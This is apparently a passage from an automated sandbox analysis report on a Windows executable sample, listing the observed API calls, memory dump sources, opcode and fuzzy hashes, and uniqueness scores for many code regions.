                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                        • Instruction ID: c8ec40f95866fe3ef3643523b7f601a115fc60bb26227319518f0373321ffe3c
                                                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                        • Instruction Fuzzy Hash: 880126722003056BE7329F668885A6AFBEDEB85330F26055DE18487281EA30A845C734
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00389813,00000001,00000364,?,003840EF,?,?,003A1098), ref: 0038B177
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 00d00f84d757f2b00a14defb54be6e1f55f053166ced753a5ad6c3313ffc1249
                                                                                        • Instruction ID: 7969b3f69729fb4a1bd905cd432be6d37d2c60d1265d3d5f7bb651ebeafa3e4a
                                                                                        • Opcode Fuzzy Hash: 00d00f84d757f2b00a14defb54be6e1f55f053166ced753a5ad6c3313ffc1249
                                                                                        • Instruction Fuzzy Hash: 8FF0B43254532667DB277B21AC1EB6FB758AB41760B198192B8089E190CB60D90183E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00383C3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
                                                                                        • Instruction ID: e2577761f3cc48dd79a4c6a910ad1bb55afc80913deeecc9eb0e40b8379de56f
                                                                                        • Opcode Fuzzy Hash: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
                                                                                        • Instruction Fuzzy Hash: BDF08C322003169F8F13AEA8EC0099A77A9BF01F207104165FA06E6290DB31EA20C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
                                                                                        • Instruction ID: cd6b4acd31763c7ea857ba89a8a5af2a60ae2aaa5d952c7de696a99f0ea06c30
                                                                                        • Opcode Fuzzy Hash: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
                                                                                        • Instruction Fuzzy Hash: F9E0ED3124672556EA7337719C09BAB768C9F813A0FA601E1BC089A491CF60ED0083E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00365AC2
                                                                                          • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
                                                                                        • Instruction ID: 57686d49781795d4acdf08ef2f55a61fa712c4e158372675656baec87a30fd47
                                                                                        • Opcode Fuzzy Hash: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
                                                                                        • Instruction Fuzzy Hash: E801A430410790DAD72AE7B8C0517DDFBE4DF59304F50C48DA45A57283CBB81B08D7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID:
                                                                                        • API String ID: 2591292051-0
                                                                                        • Opcode ID: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
                                                                                        • Instruction ID: 441de211ebd2e385ae111f729651c0af9a128463dce77d7bec79bb05bc7f5729
                                                                                        • Opcode Fuzzy Hash: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
                                                                                        • Instruction Fuzzy Hash: 17F08270481B15DFDB328B64C459B92B7ECAB12335F049B1FD0E7439E4D771698D8A50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
                                                                                          • Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
                                                                                          • Part of subcall function 0036A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1464966427-0
                                                                                        • Opcode ID: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
                                                                                        • Instruction ID: 96d459b21b0f48c66d31e0d159c861ba29f18859239c04a427e9dae86f86f089
                                                                                        • Opcode Fuzzy Hash: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
                                                                                        • Instruction Fuzzy Hash: DEF05431008B90AACA2367B489047C7BB945F17321F04CA4DF1FA6619AC26550989F23
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00370E3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecutionStateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2211380416-0
                                                                                        • Opcode ID: 55bce2f24bfca7fd0d1606c2d4ee8572ca0c0c3f1c01617e92494a7b9afd8767
                                                                                        • Instruction ID: 7d4a6f3cfffe9baf89a15e1b53113ef8aaccb58b1d3b3344e5429f1179e87102
                                                                                        • Opcode Fuzzy Hash: 55bce2f24bfca7fd0d1606c2d4ee8572ca0c0c3f1c01617e92494a7b9afd8767
                                                                                        • Instruction Fuzzy Hash: 95D0121560145456DA37732C68567FE350A8FC7351F0D8066B14D6F686CA5D4886A261
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 0037A62C
                                                                                          • Part of subcall function 0037A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                        • String ID:
                                                                                        • API String ID: 1915507550-0
                                                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                        • Instruction ID: e0e7f04f156f40a62237deca0e83a9142f32b0b418472d496327d8b291e1416f
                                                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                        • Instruction Fuzzy Hash: 59D0C97121460DBAEF636F618C1296E7A99EB80340F04C125B84AD9191EAB9DA10EA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00371B3E), ref: 0037DD92
                                                                                          • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                          • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                          • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                          • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                          • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 897784432-0
                                                                                        • Opcode ID: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
                                                                                        • Instruction ID: ee75ec9fc387abbba984c31d28b872dda9580f5d552919ba45765d3779911914
                                                                                        • Opcode Fuzzy Hash: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
                                                                                        • Instruction Fuzzy Hash: FED09E32144300BAD6132B51CD06F0E7AB6AB89B08F008954B288740B1CA72AD31DB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DloadProtectSection.DELAYIMP ref: 0037E5E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadProtectSection
                                                                                        • String ID:
                                                                                        • API String ID: 2203082970-0
                                                                                        • Opcode ID: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
                                                                                        • Instruction ID: 4deacd0ad87eb9b31513ee87a51207aa9280bf6a8f12d191f6868a588fb53902
                                                                                        • Opcode Fuzzy Hash: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
                                                                                        • Instruction Fuzzy Hash: 18D0C9B01802809AD637EBA89886B583258BB2EB14F94C1A5F14DD9492DA6C9491E70A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetFileType.KERNELBASE(000000FF,003697BE), ref: 003698C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
                                                                                        • Instruction ID: 9268aa04dce8aef46cdbc0d17eb6373e4d9e4a5353dc4f1f7188a11b2fae682c
                                                                                        • Opcode Fuzzy Hash: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
                                                                                        • Instruction Fuzzy Hash: 16C01238400205C68E228B249848199736AAA533A6BB5E696C029CA0A5C333CC8BEA01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
                                                                                        • Instruction ID: 7529d0dffd46a62389348039ad443c5b1ce1aa613dea6cc21d3da9c239d63c93
                                                                                        • Opcode Fuzzy Hash: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
                                                                                        • Instruction Fuzzy Hash: F9B012FB268010FC3217E1051C02E37021CC0C8F10330D06EF82DC5480D8484E000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
                                                                                        • Instruction ID: da0bbaa1a40f37d6217a6179d1184094eb5a2d79eab332ef431174c10b935ce0
                                                                                        • Opcode Fuzzy Hash: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
                                                                                        • Instruction Fuzzy Hash: 72B012EA268010BC3217A1051D02E77021CC4C8F10330D06EF52DC5480D8440C091533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
                                                                                        • Instruction ID: 1699ad4d8e104d9d64864efc4099f0391224a0759725872bc580d1fd22714bde
                                                                                        • Opcode Fuzzy Hash: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
                                                                                        • Instruction Fuzzy Hash: 0FB012EA268010FC3217F1051C02E37021CC4C8F10330D06FF82DC5480D8444C040533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
